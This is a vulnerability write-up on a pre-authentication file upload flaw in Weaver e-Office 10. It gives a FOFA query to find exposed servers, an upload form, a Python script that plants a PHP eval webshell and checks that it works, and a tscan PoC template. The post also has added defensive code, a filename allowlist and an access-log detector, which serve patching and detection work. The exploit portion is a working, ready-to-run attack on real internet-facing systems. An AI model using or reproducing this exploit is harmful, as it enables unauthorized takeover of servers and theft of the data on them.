1. Vulnerability details
A vulnerability disclosed during the 2022 HVV (护网) exercise shows that the front end (pre-login) of 泛微 (Weaver) e-Office 10 has an arbitrary file upload vulnerability that can be used to get a shell.
2. Affected scope
Affected product versions: 泛微 (Weaver) e-Office 10
3. Reproduction
Search with FOFA:
title="eoffice10"
Build an HTML page:
<form method="post"
      action="http://xx.xx.xx.xx:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
      enctype="multipart/form-data">
  <input type="file" name="FileData"/><br/><br/>
  <input type="text" name="FormData" value="{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'teststcs.php'}"/><br/><br/>
  <button type="submit" value="上传">上传</button>
</form>
Replace the action attribute with the target address.
Open the page in a browser and the PHP script is uploaded, giving a webshell.
Writing the PoC
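The form above shows the defect: the SAVEFILE option stores the file under the client-supplied FILENAME inside the web root, and nothing stops that name from ending in .php. The Python below is an added example of the server-side check that closes this class of bug; it is not Weaver's code and not part of the original post. It assumes the FormData payload has already been parsed into a dict with the OPTION and FILENAME keys seen in the form, and the allowlist of document extensions is a constructed illustration.

```python
import os
import re
import secrets

# Constructed allowlist for illustration: the document types an office-editing
# endpoint legitimately stores. Script extensions are simply absent, so no
# blocklist of dangerous extensions has to be maintained.
ALLOWED_EXTENSIONS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "wps", "et", "dps"}

# One stem, one extension, ASCII only: no separators, extra dots, spaces or control bytes.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_\-]{1,64}\.[A-Za-z0-9]{1,8}")


def is_safe_save_filename(filename):
    """Accept FILENAME only as a bare base name with an allowlisted extension."""
    if not isinstance(filename, str) or not filename or "\x00" in filename:
        return False
    # Any directory component means the client, not the server, picks the location.
    if os.path.basename(filename) != filename or "/" in filename or "\\" in filename:
        return False
    if _SAFE_NAME.fullmatch(filename) is None:
        return False
    return filename.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def decide_savefile(form_data):
    """Decide a SAVEFILE request from the parsed FormData dict (assumed shape).

    Returns (True, storage_name) when accepted or (False, reason) when rejected.
    The storage name is generated server-side; the client-supplied name only
    contributes its extension, and only after that extension passed the allowlist.
    """
    if form_data.get("OPTION") != "SAVEFILE":
        return False, "unsupported OPTION"
    filename = form_data.get("FILENAME", "")
    if not is_safe_save_filename(filename):
        return False, "rejected FILENAME %r" % (filename,)
    ext = filename.rsplit(".", 1)[1].lower()
    return True, "%s.%s" % (secrets.token_hex(16), ext)


if __name__ == "__main__":
    # The FILENAME from the page's form next to a legitimate document name.
    for name in ("teststcs.php", "report.docx", "../../shell.docx"):
        print(name, "->", decide_savefile({"OPTION": "SAVEFILE", "FILENAME": name}))
```

The extension check is the necessary fix, not the whole one: the Document/ directory should additionally be served with script execution disabled (or live outside the web root), so that a bypass of the name check still yields an inert file rather than a webshell.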
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @userVersion : python 3.7
# @Author : fsrm
# @Data : 2022/08/08
# @Effect : temp
# @Version : V1.1
import json
import sys
from urllib.parse import urlsplit

import requests

Header = {
    'Content-Length': '397',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'null',
    # 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarypgyxaBmmbboTooNw',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36',
    'Accept-Language': 'zh-CN',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Sec-GPC': '1',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'close'
}
# proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }


def checkversion(baseurl):
    # Fingerprint: version.json reports the major version of the installation
    versionurl = baseurl + "/eoffice10/version.json"
    try:
        r = requests.get(versionurl, verify=False, timeout=10)
        jsonres = json.loads(r.text)
        if jsonres['version'] == 10:
            # print(jsonres)
            return True
        else:
            return False
    except Exception as e:
        print(str(e))
        return False


def postdata(baseurl):
    # Multipart upload to the SAVEFILE handler; FILENAME controls the stored name
    posturl = baseurl + "/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
    files = {
        "FileData": ("1.jpg", "<?php echo(md5(cde4f31a5));@eval($_POST[stcs]);?>", "image/jpeg"),
        "FormData": (None, "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'cde4f31a5.php'}")
    }
    # r=requests.post(posturl,data=None,headers=Header,files=files,proxies=proxies)
    r = requests.post(posturl, data=None, headers=Header, files=files, verify=False, timeout=10)
    return


def checkresult(baseurl):
    # The uploaded file is stored under the Document directory
    checkurl = baseurl + "/eoffice10/server/public/iWebOffice2015/Document/cde4f31a5.php"
    # print(checkurl)
    r = requests.get(checkurl, verify=False, timeout=10)
    if "4e700eabf8fc3788516fb02c5d4e38e2" in r.text:
        print("[+]存在漏洞 shell地址:" + checkurl)
    else:
        print("[-] 不存在漏洞")


def main(url):
    result = urlsplit(url)
    basetarget = result.scheme + "://" + result.netloc
    # print(basetarget)
    versionres = checkversion(basetarget)
    if versionres == False:
        print("不存在漏洞")
        return
    # Upload the file
    postdata(basetarget)
    # Verify the result
    checkresult(basetarget)


if __name__ == '__main__':
    if len(sys.argv) > 1:
        url = sys.argv[1]
        main(url)
    else:
        print("usg: python eoffice10upload.py http://xxxxxxxx")
Execution result
tscan POC
params: []
name: fanwei_eoffice10_getshell_2022.08
set:
  randstr: randomLowercase(10)
  randint: randomInt(800000000, 1000000000)
rules:
  - method: POST
    path: /eoffice10/server/public/iWebOffice2015/OfficeServer.php
    headers:
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8vJ2eQQn6YZjc9Zm
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36
    body: |-
      ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm
      Content-Disposition: form-data; name="FileData"; filename="1.jpg"
      Content-Type: image/jpeg

      <?php echo(md5({{randint}}));?>
      ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm
      Content-Disposition: form-data; name="FormData"

      {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'{{randstr}}.php'}
      ------WebKitFormBoundary8vJ2eQQn6YZjc9Zm--
    search: ""
    followredirects: false
    expression: response.status==200
  - method: GET
    path: /eoffice10/server/public/iWebOffice2015/Document/{{randstr}}.php
    headers: {}
    body: ""
    search: ""
    followredirects: false
    expression: response.status==200 && response.body.bcontains(bytes(substr(md5(string(randint)),0,31)))
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""
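Both PoCs above leave the same two-step footprint in the web server's access log: a POST to OfficeServer.php followed shortly by a GET for a .php file under iWebOffice2015/Document/, the directory where the document component stores uploads. The Python below is an added detection example for defenders; it is not part of the original post or of either PoC tool. The log lines are constructed in combined log format (the attacker addresses are documentation ranges), and the five-minute correlation window is an assumed tuning value.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Paths taken from the PoCs above.
UPLOAD_ENDPOINT = "/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
DOCUMENT_DIR = "/eoffice10/server/public/iWebOffice2015/Document/"
# Assumed tuning value: how long after an upload a fetched .php still counts as correlated.
CORRELATION_WINDOW = timedelta(minutes=5)

# Apache/Nginx combined log format: ip ident user [ts] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one full upload-then-execute sequence, one benign
# document upload, and one stray request for a .php with no preceding upload.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Aug/2022:10:15:01 +0800] "GET /eoffice10/version.json HTTP/1.1" 200 41 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Aug/2022:10:15:02 +0800] "POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1" 200 188 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Aug/2022:10:15:03 +0800] "GET /eoffice10/server/public/iWebOffice2015/Document/cde4f31a5.php HTTP/1.1" 200 32 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Aug/2022:10:20:00 +0800] "POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1" 200 188 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Aug/2022:10:20:01 +0800] "GET /eoffice10/server/public/iWebOffice2015/Document/report.docx HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [08/Aug/2022:11:00:00 +0800] "GET /eoffice10/server/public/iWebOffice2015/Document/old.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]  # drop any query string
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": path, "status": int(m.group("status"))}


def detect(lines):
    """Return findings for every .php fetched from the Document directory.

    A finding is 'high' when the same client POSTed to the upload endpoint
    within CORRELATION_WINDOW beforehand and the script answered 200; any other
    .php request under Document/ is 'medium', since that directory should only
    ever hold documents.
    """
    findings = []
    uploads = defaultdict(list)  # client ip -> timestamps of upload POSTs
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"] == UPLOAD_ENDPOINT:
            uploads[ev["ip"]].append(ev["ts"])
            continue
        if ev["path"].startswith(DOCUMENT_DIR) and ev["path"].lower().endswith(".php"):
            prior = [t for t in uploads[ev["ip"]]
                     if timedelta(0) <= ev["ts"] - t <= CORRELATION_WINDOW]
            findings.append({
                "ip": ev["ip"],
                "path": ev["path"],
                "status": ev["status"],
                "correlated_uploads": len(prior),
                "severity": "high" if prior and ev["status"] == 200 else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print("[%s] %s fetched %s (status %d, %d prior upload(s))"
              % (f["severity"], f["ip"], f["path"], f["status"], f["correlated_uploads"]))
```

On the sample log this yields two findings: the high-severity sequence from 203.0.113.5 and a medium one for the 404 from 192.0.2.9; the .docx upload from 198.51.100.7 is not flagged. In production the same logic also works as a file-integrity rule: any .php appearing in the Document/ directory on disk is an incident regardless of what the access log shows.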
4. Remediation
Upgrade to the latest version as soon as possible.